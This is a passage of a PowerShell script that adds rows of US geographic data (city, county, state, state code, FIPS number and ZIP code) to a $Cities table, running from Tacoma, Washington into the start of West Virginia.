$Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98402") + $null = $Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98403") + $null = $Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98404") + $null = $Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98405") + $null = $Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98406") + $null = $Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98407") + $null = $Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98408") + $null = $Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98409") + $null = $Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98421") + $null = $Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98422") + $null = $Cities.Rows.Add("Fife","Pierce","Washington","WA","53","98424") + $null = $Cities.Rows.Add("Fort lewis","Pierce","Washington","WA","53","98433") + $null = $Cities.Rows.Add("Lakewood center","Pierce","Washington","WA","53","98439") + $null = $Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98443") + $null = $Cities.Rows.Add("Parkland","Pierce","Washington","WA","53","98444") + $null = $Cities.Rows.Add("Parkland","Pierce","Washington","WA","53","98445") + $null = $Cities.Rows.Add("Parkland","Pierce","Washington","WA","53","98446") + $null = $Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98465") + $null = $Cities.Rows.Add("Fircrest","Pierce","Washington","WA","53","98466") + $null = $Cities.Rows.Add("Tacoma","Pierce","Washington","WA","53","98467") + $null = $Cities.Rows.Add("Lakewood center","Pierce","Washington","WA","53","98498") + $null = $Cities.Rows.Add("Lakewood center","Pierce","Washington","WA","53","98499") + $null = $Cities.Rows.Add("Zcta 984hh","Pierce","Washington","WA","53","984HH") + $null = $Cities.Rows.Add("Olympia","Thurston","Washington","WA","53","98501") + $null = $Cities.Rows.Add("Olympia","Thurston","Washington","WA","53","98502") + $null = $Cities.Rows.Add("Lacey","Thurston","Washington","WA","53","98503") + $null = $Cities.Rows.Add("Lacey","Thurston","Washington","WA","53","98506") + $null = $Cities.Rows.Add("Olympia","Thurston","Washington","WA","53","98512") + $null = $Cities.Rows.Add("Lacey","Thurston","Washington","WA","53","98513") + $null = $Cities.Rows.Add("Lacey","Thurston","Washington","WA","53","98516") + $null = $Cities.Rows.Add("Aberdeen","Grays Harbor","Washington","WA","53","98520") + $null = $Cities.Rows.Add("Allyn","Mason","Washington","WA","53","98524") + $null = $Cities.Rows.Add("Amanda park","Grays Harbor","Washington","WA","53","98526") + $null = $Cities.Rows.Add("Bay center","Pacific","Washington","WA","53","98527") + $null = $Cities.Rows.Add("Bear creek","Mason","Washington","WA","53","98528") + $null = $Cities.Rows.Add("Bucoda","Thurston","Washington","WA","53","98530") + $null = $Cities.Rows.Add("Centralia","Lewis","Washington","WA","53","98531") + $null = $Cities.Rows.Add("Chehalis","Lewis","Washington","WA","53","98532") + $null = $Cities.Rows.Add("Cinebar","Lewis","Washington","WA","53","98533") + $null = $Cities.Rows.Add("Copalis beach","Grays Harbor","Washington","WA","53","98535") + $null = $Cities.Rows.Add("Copalis crossing","Grays Harbor","Washington","WA","53","98536") + $null = $Cities.Rows.Add("Cosmopolis","Grays Harbor","Washington","WA","53","98537") + $null = $Cities.Rows.Add("Curtis","Lewis","Washington","WA","53","98538") + $null = $Cities.Rows.Add("Doty","Lewis","Washington","WA","53","98539") + $null = $Cities.Rows.Add("Elma","Grays Harbor","Washington","WA","53","98541") + $null = $Cities.Rows.Add("Ethel","Lewis","Washington","WA","53","98542") + $null = $Cities.Rows.Add("Grapeview","Mason","Washington","WA","53","98546") + $null = $Cities.Rows.Add("Grayland","Grays Harbor","Washington","WA","53","98547") + $null = $Cities.Rows.Add("Hoodsport","Mason","Washington","WA","53","98548") + $null = $Cities.Rows.Add("Hoquiam","Grays Harbor","Washington","WA","53","98550") + $null = $Cities.Rows.Add("Humptulips","Grays Harbor","Washington","WA","53","98552") + $null = $Cities.Rows.Add("Lilliwaup","Mason","Washington","WA","53","98555") + $null = $Cities.Rows.Add("Mc cleary","Grays Harbor","Washington","WA","53","98557") + $null = $Cities.Rows.Add("Malone","Grays Harbor","Washington","WA","53","98559") + $null = $Cities.Rows.Add("Matlock","Mason","Washington","WA","53","98560") + $null = $Cities.Rows.Add("Moclips","Grays Harbor","Washington","WA","53","98562") + $null = $Cities.Rows.Add("Montesano","Grays Harbor","Washington","WA","53","98563") + $null = $Cities.Rows.Add("Mossyrock","Lewis","Washington","WA","53","98564") + $null = $Cities.Rows.Add("Napavine","Lewis","Washington","WA","53","98565") + $null = $Cities.Rows.Add("Oakville","Grays Harbor","Washington","WA","53","98568") + $null = $Cities.Rows.Add("Ocean city","Grays Harbor","Washington","WA","53","98569") + $null = $Cities.Rows.Add("Onalaska","Lewis","Washington","WA","53","98570") + $null = $Cities.Rows.Add("Pacific beach","Grays Harbor","Washington","WA","53","98571") + $null = $Cities.Rows.Add("Pe ell","Lewis","Washington","WA","53","98572") + $null = $Cities.Rows.Add("Quinault","Grays Harbor","Washington","WA","53","98575") + $null = $Cities.Rows.Add("Rainier","Thurston","Washington","WA","53","98576") + $null = $Cities.Rows.Add("Raymond","Pacific","Washington","WA","53","98577") + $null = $Cities.Rows.Add("Rochester","Thurston","Washington","WA","53","98579") + $null = $Cities.Rows.Add("Roy","Pierce","Washington","WA","53","98580") + $null = $Cities.Rows.Add("Ryderwood","Cowlitz","Washington","WA","53","98581") + $null = $Cities.Rows.Add("Salkum","Lewis","Washington","WA","53","98582") + $null = $Cities.Rows.Add("Shelton","Mason","Washington","WA","53","98584") + $null = $Cities.Rows.Add("Silver creek","Lewis","Washington","WA","53","98585") + $null = $Cities.Rows.Add("South bend","Pacific","Washington","WA","53","98586") + $null = $Cities.Rows.Add("Taholah","Grays Harbor","Washington","WA","53","98587") + $null = $Cities.Rows.Add("Tahuya","Mason","Washington","WA","53","98588") + $null = $Cities.Rows.Add("Tenino","Thurston","Washington","WA","53","98589") + $null = $Cities.Rows.Add("Tokeland","Pacific","Washington","WA","53","98590") + $null = $Cities.Rows.Add("Toledo","Lewis","Washington","WA","53","98591") + $null = $Cities.Rows.Add("Union","Mason","Washington","WA","53","98592") + $null = $Cities.Rows.Add("Vader","Lewis","Washington","WA","53","98593") + $null = $Cities.Rows.Add("Westport","Grays Harbor","Washington","WA","53","98595") + $null = $Cities.Rows.Add("Winlock","Lewis","Washington","WA","53","98596") + $null = $Cities.Rows.Add("Yelm","Thurston","Washington","WA","53","98597") + $null = $Cities.Rows.Add("Zcta 985hh","Grays Harbor","Washington","WA","53","985HH") + $null = $Cities.Rows.Add("Zcta 985xx","Grays Harbor","Washington","WA","53","985XX") + $null = $Cities.Rows.Add("Amboy","Clark","Washington","WA","53","98601") + $null = $Cities.Rows.Add("Appleton","Klickitat","Washington","WA","53","98602") + $null = $Cities.Rows.Add("Ariel","Cowlitz","Washington","WA","53","98603") + $null = $Cities.Rows.Add("Battle ground","Clark","Washington","WA","53","98604") + $null = $Cities.Rows.Add("Cook","Klickitat","Washington","WA","53","98605") + $null = $Cities.Rows.Add("Brush prairie","Clark","Washington","WA","53","98606") + $null = $Cities.Rows.Add("Camas","Clark","Washington","WA","53","98607") + $null = $Cities.Rows.Add("Carson","Skamania","Washington","WA","53","98610") + $null = $Cities.Rows.Add("Castle rock","Cowlitz","Washington","WA","53","98611") + $null = $Cities.Rows.Add("Cathlamet","Wahkiakum","Washington","WA","53","98612") + $null = $Cities.Rows.Add("Centerville","Klickitat","Washington","WA","53","98613") + $null = $Cities.Rows.Add("Chinook","Pacific","Washington","WA","53","98614") + $null = $Cities.Rows.Add("Cougar","Cowlitz","Washington","WA","53","98616") + $null = $Cities.Rows.Add("Dallesport","Klickitat","Washington","WA","53","98617") + $null = $Cities.Rows.Add("Glenwood","Klickitat","Washington","WA","53","98619") + $null = $Cities.Rows.Add("Goldendale","Klickitat","Washington","WA","53","98620") + $null = $Cities.Rows.Add("Grays river","Wahkiakum","Washington","WA","53","98621") + $null = $Cities.Rows.Add("Ilwaco","Pacific","Washington","WA","53","98624") + $null = $Cities.Rows.Add("Kalama","Cowlitz","Washington","WA","53","98625") + $null = $Cities.Rows.Add("Kelso","Cowlitz","Washington","WA","53","98626") + $null = $Cities.Rows.Add("Klickitat","Klickitat","Washington","WA","53","98628") + $null = $Cities.Rows.Add("La center","Clark","Washington","WA","53","98629") + $null = $Cities.Rows.Add("Long beach","Pacific","Washington","WA","53","98631") + $null = $Cities.Rows.Add("Longview","Cowlitz","Washington","WA","53","98632") + $null = $Cities.Rows.Add("Lyle","Klickitat","Washington","WA","53","98635") + $null = $Cities.Rows.Add("Naselle","Pacific","Washington","WA","53","98638") + $null = $Cities.Rows.Add("North bonneville","Skamania","Washington","WA","53","98639") + $null = $Cities.Rows.Add("Ocean park","Pacific","Washington","WA","53","98640") + $null = $Cities.Rows.Add("Oysterville","Pacific","Washington","WA","53","98641") + $null = $Cities.Rows.Add("Ridgefield","Clark","Washington","WA","53","98642") + $null = $Cities.Rows.Add("Rosburg","Wahkiakum","Washington","WA","53","98643") + $null = $Cities.Rows.Add("Seaview","Pacific","Washington","WA","53","98644") + $null = $Cities.Rows.Add("Silverlake","Cowlitz","Washington","WA","53","98645") + $null = $Cities.Rows.Add("Skamokawa","Wahkiakum","Washington","WA","53","98647") + $null = $Cities.Rows.Add("Stevenson","Skamania","Washington","WA","53","98648") + $null = $Cities.Rows.Add("Toutle","Cowlitz","Washington","WA","53","98649") + $null = $Cities.Rows.Add("Trout lake","Klickitat","Washington","WA","53","98650") + $null = $Cities.Rows.Add("Underwood","Skamania","Washington","WA","53","98651") + $null = $Cities.Rows.Add("Vancouver","Clark","Washington","WA","53","98660") + $null = $Cities.Rows.Add("Vancouver","Clark","Washington","WA","53","98661") + $null = $Cities.Rows.Add("Orchards","Clark","Washington","WA","53","98662") + $null = $Cities.Rows.Add("Vancouver","Clark","Washington","WA","53","98663") + $null = $Cities.Rows.Add("Vancouver","Clark","Washington","WA","53","98664") + $null = $Cities.Rows.Add("Hazel dell","Clark","Washington","WA","53","98665") + $null = $Cities.Rows.Add("Wahkiacus","Klickitat","Washington","WA","53","98670") + $null = $Cities.Rows.Add("Washougal","Clark","Washington","WA","53","98671") + $null = $Cities.Rows.Add("White salmon","Klickitat","Washington","WA","53","98672") + $null = $Cities.Rows.Add("Wishram","Klickitat","Washington","WA","53","98673") + $null = $Cities.Rows.Add("Woodland","Cowlitz","Washington","WA","53","98674") + $null = $Cities.Rows.Add("Yacolt","Clark","Washington","WA","53","98675") + $null = $Cities.Rows.Add("Vancouver","Clark","Washington","WA","53","98682") + $null = $Cities.Rows.Add("Zcta 98683","Clark","Washington","WA","53","98683") + $null = $Cities.Rows.Add("Cascade park","Clark","Washington","WA","53","98684") + $null = $Cities.Rows.Add("Felida","Clark","Washington","WA","53","98685") + $null = $Cities.Rows.Add("Vancouver","Clark","Washington","WA","53","98686") + $null = $Cities.Rows.Add("Zcta 986hh","Clark","Washington","WA","53","986HH") + $null = $Cities.Rows.Add("Zcta 986xx","Cowlitz","Washington","WA","53","986XX") + $null = $Cities.Rows.Add("Wenatchee","Chelan","Washington","WA","53","98801") + $null = $Cities.Rows.Add("East wenatchee","Douglas","Washington","WA","53","98802") + $null = $Cities.Rows.Add("Ardenvoir","Chelan","Washington","WA","53","98811") + $null = $Cities.Rows.Add("Brewster","Okanogan","Washington","WA","53","98812") + $null = $Cities.Rows.Add("Bridgeport","Douglas","Washington","WA","53","98813") + $null = $Cities.Rows.Add("Carlton","Okanogan","Washington","WA","53","98814") + $null = $Cities.Rows.Add("Cashmere","Chelan","Washington","WA","53","98815") + $null = $Cities.Rows.Add("Chelan","Chelan","Washington","WA","53","98816") + $null = $Cities.Rows.Add("Chelan falls","Chelan","Washington","WA","53","98817") + $null = $Cities.Rows.Add("Conconully","Okanogan","Washington","WA","53","98819") + $null = $Cities.Rows.Add("Dryden","Chelan","Washington","WA","53","98821") + $null = $Cities.Rows.Add("Entiat","Chelan","Washington","WA","53","98822") + $null = $Cities.Rows.Add("Ephrata","Grant","Washington","WA","53","98823") + $null = $Cities.Rows.Add("Leavenworth","Chelan","Washington","WA","53","98826") + $null = $Cities.Rows.Add("Loomis","Okanogan","Washington","WA","53","98827") + $null = $Cities.Rows.Add("Malaga","Chelan","Washington","WA","53","98828") + $null = $Cities.Rows.Add("Malott","Okanogan","Washington","WA","53","98829") + $null = $Cities.Rows.Add("Mansfield","Douglas","Washington","WA","53","98830") + $null = $Cities.Rows.Add("Manson","Chelan","Washington","WA","53","98831") + $null = $Cities.Rows.Add("Marlin","Grant","Washington","WA","53","98832") + $null = $Cities.Rows.Add("Mazama","Okanogan","Washington","WA","53","98833") + $null = $Cities.Rows.Add("Methow","Okanogan","Washington","WA","53","98834") + $null = $Cities.Rows.Add("Monitor","Chelan","Washington","WA","53","98836") + $null = $Cities.Rows.Add("Moses lake","Grant","Washington","WA","53","98837") + $null = $Cities.Rows.Add("Okanogan","Okanogan","Washington","WA","53","98840") + $null = $Cities.Rows.Add("Omak","Okanogan","Washington","WA","53","98841") + $null = $Cities.Rows.Add("Orondo","Douglas","Washington","WA","53","98843") + $null = $Cities.Rows.Add("Oroville","Okanogan","Washington","WA","53","98844") + $null = $Cities.Rows.Add("Palisades","Douglas","Washington","WA","53","98845") + $null = $Cities.Rows.Add("Pateros","Okanogan","Washington","WA","53","98846") + $null = $Cities.Rows.Add("Peshastin","Chelan","Washington","WA","53","98847") + $null = $Cities.Rows.Add("Quincy","Grant","Washington","WA","53","98848") + $null = $Cities.Rows.Add("Riverside","Okanogan","Washington","WA","53","98849") + $null = $Cities.Rows.Add("Rock island","Douglas","Washington","WA","53","98850") + $null = $Cities.Rows.Add("Soap lake","Grant","Washington","WA","53","98851") + $null = $Cities.Rows.Add("Stehekin","Chelan","Washington","WA","53","98852") + $null = $Cities.Rows.Add("Stratford","Grant","Washington","WA","53","98853") + $null = $Cities.Rows.Add("Tonasket","Okanogan","Washington","WA","53","98855") + $null = $Cities.Rows.Add("Twisp","Okanogan","Washington","WA","53","98856") + $null = $Cities.Rows.Add("Warden","Grant","Washington","WA","53","98857") + $null = $Cities.Rows.Add("Waterville","Douglas","Washington","WA","53","98858") + $null = $Cities.Rows.Add("Wauconda","Okanogan","Washington","WA","53","98859") + $null = $Cities.Rows.Add("Wilson creek","Grant","Washington","WA","53","98860") + $null = $Cities.Rows.Add("Winthrop","Okanogan","Washington","WA","53","98862") + $null = $Cities.Rows.Add("Zcta 988hh","Chelan","Washington","WA","53","988HH") + $null = $Cities.Rows.Add("Zcta 988xx","Okanogan","Washington","WA","53","988XX") + $null = $Cities.Rows.Add("Terrace heights","Yakima","Washington","WA","53","98901") + $null = $Cities.Rows.Add("Yakima","Yakima","Washington","WA","53","98902") + $null = $Cities.Rows.Add("Union gap","Yakima","Washington","WA","53","98903") + $null = $Cities.Rows.Add("Wide hollow","Yakima","Washington","WA","53","98908") + $null = $Cities.Rows.Add("Cle elum","Kittitas","Washington","WA","53","98922") + $null = $Cities.Rows.Add("Cowiche","Yakima","Washington","WA","53","98923") + $null = $Cities.Rows.Add("Easton","Kittitas","Washington","WA","53","98925") + $null = $Cities.Rows.Add("Ellensburg","Kittitas","Washington","WA","53","98926") + $null = $Cities.Rows.Add("Grandview","Yakima","Washington","WA","53","98930") + $null = $Cities.Rows.Add("Granger","Yakima","Washington","WA","53","98932") + $null = $Cities.Rows.Add("Harrah","Yakima","Washington","WA","53","98933") + $null = $Cities.Rows.Add("Kittitas","Kittitas","Washington","WA","53","98934") + $null = $Cities.Rows.Add("Mabton","Yakima","Washington","WA","53","98935") + $null = $Cities.Rows.Add("Moxee","Yakima","Washington","WA","53","98936") + $null = $Cities.Rows.Add("White pass","Yakima","Washington","WA","53","98937") + $null = $Cities.Rows.Add("Outlook","Yakima","Washington","WA","53","98938") + $null = $Cities.Rows.Add("Ronald","Kittitas","Washington","WA","53","98940") + $null = $Cities.Rows.Add("Roslyn","Kittitas","Washington","WA","53","98941") + $null = $Cities.Rows.Add("Selah","Yakima","Washington","WA","53","98942") + $null = $Cities.Rows.Add("South cle elum","Kittitas","Washington","WA","53","98943") + $null = $Cities.Rows.Add("Sunnyside","Yakima","Washington","WA","53","98944") + $null = $Cities.Rows.Add("Thorp","Kittitas","Washington","WA","53","98946") + $null = $Cities.Rows.Add("Tieton","Yakima","Washington","WA","53","98947") + $null = $Cities.Rows.Add("Toppenish","Yakima","Washington","WA","53","98948") + $null = $Cities.Rows.Add("Vantage","Kittitas","Washington","WA","53","98950") + $null = $Cities.Rows.Add("Wapato","Yakima","Washington","WA","53","98951") + $null = $Cities.Rows.Add("White swan","Yakima","Washington","WA","53","98952") + $null = $Cities.Rows.Add("Zillah","Yakima","Washington","WA","53","98953") + $null = $Cities.Rows.Add("Zcta 989hh","Benton","Washington","WA","53","989HH") + $null = $Cities.Rows.Add("Zcta 989xx","Yakima","Washington","WA","53","989XX") + $null = $Cities.Rows.Add("Airway heights","Spokane","Washington","WA","53","99001") + $null = $Cities.Rows.Add("Chattaroy","Spokane","Washington","WA","53","99003") + $null = $Cities.Rows.Add("Cheney","Spokane","Washington","WA","53","99004") + $null = $Cities.Rows.Add("Colbert","Spokane","Washington","WA","53","99005") + $null = $Cities.Rows.Add("Deer park","Spokane","Washington","WA","53","99006") + $null = $Cities.Rows.Add("Edwall","Lincoln","Washington","WA","53","99008") + $null = $Cities.Rows.Add("Elk","Spokane","Washington","WA","53","99009") + $null = $Cities.Rows.Add("Fairchild air fo","Spokane","Washington","WA","53","99011") + $null = $Cities.Rows.Add("Fairfield","Spokane","Washington","WA","53","99012") + $null = $Cities.Rows.Add("Ford","Stevens","Washington","WA","53","99013") + $null = $Cities.Rows.Add("Greenacres","Spokane","Washington","WA","53","99016") + $null = $Cities.Rows.Add("Lamont","Whitman","Washington","WA","53","99017") + $null = $Cities.Rows.Add("Latah","Spokane","Washington","WA","53","99018") + $null = $Cities.Rows.Add("Liberty lake","Spokane","Washington","WA","53","99019") + $null = $Cities.Rows.Add("Marshall","Spokane","Washington","WA","53","99020") + $null = $Cities.Rows.Add("Mead","Spokane","Washington","WA","53","99021") + $null = $Cities.Rows.Add("Espanola","Spokane","Washington","WA","53","99022") + $null = $Cities.Rows.Add("Mica","Spokane","Washington","WA","53","99023") + $null = $Cities.Rows.Add("Newman lake","Spokane","Washington","WA","53","99025") + $null = $Cities.Rows.Add("Nine mile falls","Stevens","Washington","WA","53","99026") + $null = $Cities.Rows.Add("Otis orchards","Spokane","Washington","WA","53","99027") + $null = $Cities.Rows.Add("Reardan","Lincoln","Washington","WA","53","99029") + $null = $Cities.Rows.Add("Rockford","Spokane","Washington","WA","53","99030") + $null = $Cities.Rows.Add("Spangle","Spokane","Washington","WA","53","99031") + $null = $Cities.Rows.Add("Sprague","Lincoln","Washington","WA","53","99032") + $null = $Cities.Rows.Add("Tekoa","Whitman","Washington","WA","53","99033") + $null = $Cities.Rows.Add("Tumtum","Stevens","Washington","WA","53","99034") + $null = $Cities.Rows.Add("Valleyford","Spokane","Washington","WA","53","99036") + $null = $Cities.Rows.Add("Veradale","Spokane","Washington","WA","53","99037") + $null = $Cities.Rows.Add("Wellpinit","Stevens","Washington","WA","53","99040") + $null = $Cities.Rows.Add("Zcta 990hh","Lincoln","Washington","WA","53","990HH") + $null = $Cities.Rows.Add("Zcta 990xx","Lincoln","Washington","WA","53","990XX") + $null = $Cities.Rows.Add("Addy","Stevens","Washington","WA","53","99101") + $null = $Cities.Rows.Add("Albion","Whitman","Washington","WA","53","99102") + $null = $Cities.Rows.Add("Almira","Lincoln","Washington","WA","53","99103") + $null = $Cities.Rows.Add("Benge","Adams","Washington","WA","53","99105") + $null = $Cities.Rows.Add("Chewelah","Stevens","Washington","WA","53","99109") + $null = $Cities.Rows.Add("Clayton","Stevens","Washington","WA","53","99110") + $null = $Cities.Rows.Add("Colfax","Whitman","Washington","WA","53","99111") + $null = $Cities.Rows.Add("Colton","Whitman","Washington","WA","53","99113") + $null = $Cities.Rows.Add("Colville","Stevens","Washington","WA","53","99114") + $null = $Cities.Rows.Add("Coulee city","Grant","Washington","WA","53","99115") + $null = $Cities.Rows.Add("Coulee dam","Okanogan","Washington","WA","53","99116") + $null = $Cities.Rows.Add("Creston","Lincoln","Washington","WA","53","99117") + $null = $Cities.Rows.Add("Curlew","Ferry","Washington","WA","53","99118") + $null = $Cities.Rows.Add("Cusick","Pend Oreille","Washington","WA","53","99119") + $null = $Cities.Rows.Add("Danville","Ferry","Washington","WA","53","99121") + $null = $Cities.Rows.Add("Davenport","Lincoln","Washington","WA","53","99122") + $null = $Cities.Rows.Add("Electric city","Grant","Washington","WA","53","99123") + $null = $Cities.Rows.Add("Elmer city","Okanogan","Washington","WA","53","99124") + $null = $Cities.Rows.Add("Endicott","Whitman","Washington","WA","53","99125") + $null = $Cities.Rows.Add("Evans","Stevens","Washington","WA","53","99126") + $null = $Cities.Rows.Add("Farmington","Whitman","Washington","WA","53","99128") + $null = $Cities.Rows.Add("Fruitland","Stevens","Washington","WA","53","99129") + $null = $Cities.Rows.Add("Garfield","Whitman","Washington","WA","53","99130") + $null = $Cities.Rows.Add("Gifford","Stevens","Washington","WA","53","99131") + $null = $Cities.Rows.Add("Grand coulee","Grant","Washington","WA","53","99133") + $null = $Cities.Rows.Add("Harrington","Lincoln","Washington","WA","53","99134") + $null = $Cities.Rows.Add("Hartline","Grant","Washington","WA","53","99135") + $null = $Cities.Rows.Add("Hay","Whitman","Washington","WA","53","99136") + $null = $Cities.Rows.Add("Hunters","Stevens","Washington","WA","53","99137") + $null = $Cities.Rows.Add("Inchelium","Ferry","Washington","WA","53","99138") + $null = $Cities.Rows.Add("Ione","Pend Oreille","Washington","WA","53","99139") + $null = $Cities.Rows.Add("Keller","Ferry","Washington","WA","53","99140") + $null = $Cities.Rows.Add("Kettle falls","Stevens","Washington","WA","53","99141") + $null = $Cities.Rows.Add("Lacrosse","Whitman","Washington","WA","53","99143") + $null = $Cities.Rows.Add("Laurier","Ferry","Washington","WA","53","99146") + $null = $Cities.Rows.Add("Loon lake","Stevens","Washington","WA","53","99148") + $null = $Cities.Rows.Add("Malden","Whitman","Washington","WA","53","99149") + $null = $Cities.Rows.Add("Malo","Ferry","Washington","WA","53","99150") + $null = $Cities.Rows.Add("Marcus","Stevens","Washington","WA","53","99151") + $null = $Cities.Rows.Add("Metaline","Pend Oreille","Washington","WA","53","99152") + $null = $Cities.Rows.Add("Metaline falls","Pend Oreille","Washington","WA","53","99153") + $null = $Cities.Rows.Add("Mohler","Lincoln","Washington","WA","53","99154") + $null = $Cities.Rows.Add("Nespelem","Okanogan","Washington","WA","53","99155") + $null = $Cities.Rows.Add("Newport","Pend Oreille","Washington","WA","53","99156") + $null = $Cities.Rows.Add("Northport","Stevens","Washington","WA","53","99157") + $null = $Cities.Rows.Add("Oakesdale","Whitman","Washington","WA","53","99158") + $null = $Cities.Rows.Add("Odessa","Lincoln","Washington","WA","53","99159") + $null = $Cities.Rows.Add("Orient","Ferry","Washington","WA","53","99160") + $null = $Cities.Rows.Add("Palouse","Whitman","Washington","WA","53","99161") + $null = $Cities.Rows.Add("Pullman","Whitman","Washington","WA","53","99163") + $null = $Cities.Rows.Add("Republic","Ferry","Washington","WA","53","99166") + $null = $Cities.Rows.Add("Rice","Stevens","Washington","WA","53","99167") + $null = $Cities.Rows.Add("Ritzville","Adams","Washington","WA","53","99169") + $null = $Cities.Rows.Add("Rosalia","Whitman","Washington","WA","53","99170") + $null = $Cities.Rows.Add("Saint john","Whitman","Washington","WA","53","99171") + $null = $Cities.Rows.Add("Springdale","Stevens","Washington","WA","53","99173") + $null = $Cities.Rows.Add("Thornton","Whitman","Washington","WA","53","99176") + $null = $Cities.Rows.Add("Uniontown","Whitman","Washington","WA","53","99179") + $null = $Cities.Rows.Add("Usk","Pend Oreille","Washington","WA","53","99180") + $null = $Cities.Rows.Add("Valley","Stevens","Washington","WA","53","99181") + $null = $Cities.Rows.Add("Wilbur","Lincoln","Washington","WA","53","99185") + $null = $Cities.Rows.Add("Zcta 991hh","Douglas","Washington","WA","53","991HH") + $null = $Cities.Rows.Add("Zcta 991xx","Pend Oreille","Washington","WA","53","991XX") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99201") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99202") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99203") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99204") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99205") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99206") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99207") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99208") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99212") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99216") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99217") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99218") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99223") + $null = $Cities.Rows.Add("Spokane","Spokane","Washington","WA","53","99224") + $null = $Cities.Rows.Add("Zcta 992hh","Spokane","Washington","WA","53","992HH") + $null = $Cities.Rows.Add("Pasco","Franklin","Washington","WA","53","99301") + $null = $Cities.Rows.Add("Benton city","Benton","Washington","WA","53","99320") + $null = $Cities.Rows.Add("Beverly","Grant","Washington","WA","53","99321") + $null = $Cities.Rows.Add("Bickleton","Klickitat","Washington","WA","53","99322") + $null = $Cities.Rows.Add("Burbank","Walla Walla","Washington","WA","53","99323") + $null = $Cities.Rows.Add("College place","Walla Walla","Washington","WA","53","99324") + $null = $Cities.Rows.Add("Connell","Franklin","Washington","WA","53","99326") + $null = $Cities.Rows.Add("Dayton","Columbia","Washington","WA","53","99328") + $null = $Cities.Rows.Add("Dixie","Walla Walla","Washington","WA","53","99329") + $null = $Cities.Rows.Add("Eltopia","Franklin","Washington","WA","53","99330") + $null = $Cities.Rows.Add("Hatton","Adams","Washington","WA","53","99332") + $null = $Cities.Rows.Add("Kahlotus","Franklin","Washington","WA","53","99335") + $null = $Cities.Rows.Add("Kennewick","Benton","Washington","WA","53","99336") + $null = $Cities.Rows.Add("Kennewick","Benton","Washington","WA","53","99337") + $null = $Cities.Rows.Add("Zcta 99338","Benton","Washington","WA","53","99338") + $null = $Cities.Rows.Add("Lind","Adams","Washington","WA","53","99341") + $null = $Cities.Rows.Add("Mesa","Franklin","Washington","WA","53","99343") + $null = $Cities.Rows.Add("Mattawa","Adams","Washington","WA","53","99344") + $null = $Cities.Rows.Add("Paterson","Benton","Washington","WA","53","99345") + $null = $Cities.Rows.Add("Plymouth","Benton","Washington","WA","53","99346") + $null = $Cities.Rows.Add("Pomeroy","Garfield","Washington","WA","53","99347") + $null = $Cities.Rows.Add("Prescott","Walla Walla","Washington","WA","53","99348") + $null = $Cities.Rows.Add("Zcta 99349","Grant","Washington","WA","53","99349") + $null = $Cities.Rows.Add("Prosser","Benton","Washington","WA","53","99350") + $null = $Cities.Rows.Add("Richland","Benton","Washington","WA","53","99352") + $null = $Cities.Rows.Add("Zcta 99353","Benton","Washington","WA","53","99353") + $null = $Cities.Rows.Add("Roosevelt","Klickitat","Washington","WA","53","99356") + $null = $Cities.Rows.Add("Royal city","Grant","Washington","WA","53","99357") + $null = $Cities.Rows.Add("Starbuck","Columbia","Washington","WA","53","99359") + $null = $Cities.Rows.Add("Lowden","Walla Walla","Washington","WA","53","99360") + $null = $Cities.Rows.Add("Waitsburg","Walla Walla","Washington","WA","53","99361") + $null = $Cities.Rows.Add("Walla walla","Walla Walla","Washington","WA","53","99362") + $null = $Cities.Rows.Add("Wallula","Walla Walla","Washington","WA","53","99363") + $null = $Cities.Rows.Add("Washtucna","Adams","Washington","WA","53","99371") + $null = $Cities.Rows.Add("Zcta 993hh","Benton","Washington","WA","53","993HH") + $null = $Cities.Rows.Add("Zcta 993xx","Franklin","Washington","WA","53","993XX") + $null = $Cities.Rows.Add("Anatone","Asotin","Washington","WA","53","99401") + $null = $Cities.Rows.Add("Asotin","Asotin","Washington","WA","53","99402") + $null = $Cities.Rows.Add("Clarkston","Asotin","Washington","WA","53","99403") + $null = $Cities.Rows.Add("Zcta 994hh","Asotin","Washington","WA","53","994HH") + $null = $Cities.Rows.Add("Bluewell","Mercer","West virginia","WV","54","24701") + $null = $Cities.Rows.Add("Athens","Mercer","West virginia","WV","54","24712") + $null = $Cities.Rows.Add("Beeson","Mercer","West virginia","WV","54","24714") + $null = $Cities.Rows.Add("Bramwell","Mercer","West virginia","WV","54","24715") + $null = $Cities.Rows.Add("Bud","Wyoming","West virginia","WV","54","24716") + $null = $Cities.Rows.Add("Covel","Wyoming","West virginia","WV","54","24719") + $null = $Cities.Rows.Add("Coaldale","Mercer","West virginia","WV","54","24724") + $null = $Cities.Rows.Add("Herndon","Wyoming","West virginia","WV","54","24726") + $null = $Cities.Rows.Add("Kegley","Mercer","West virginia","WV","54","24731") + $null = $Cities.Rows.Add("Lashmeet","Mercer","West virginia","WV","54","24733") + $null = $Cities.Rows.Add("Dott","Mercer","West virginia","WV","54","24736") + $null = $Cities.Rows.Add("Montcalm","Mercer","West virginia","WV","54","24737") + $null = $Cities.Rows.Add("Oakvale","Mercer","West virginia","WV","54","24739") + $null = $Cities.Rows.Add("Elgood","Mercer","West virginia","WV","54","24740") + $null = $Cities.Rows.Add("Duhring","Mercer","West virginia","WV","54","24747") + $null = 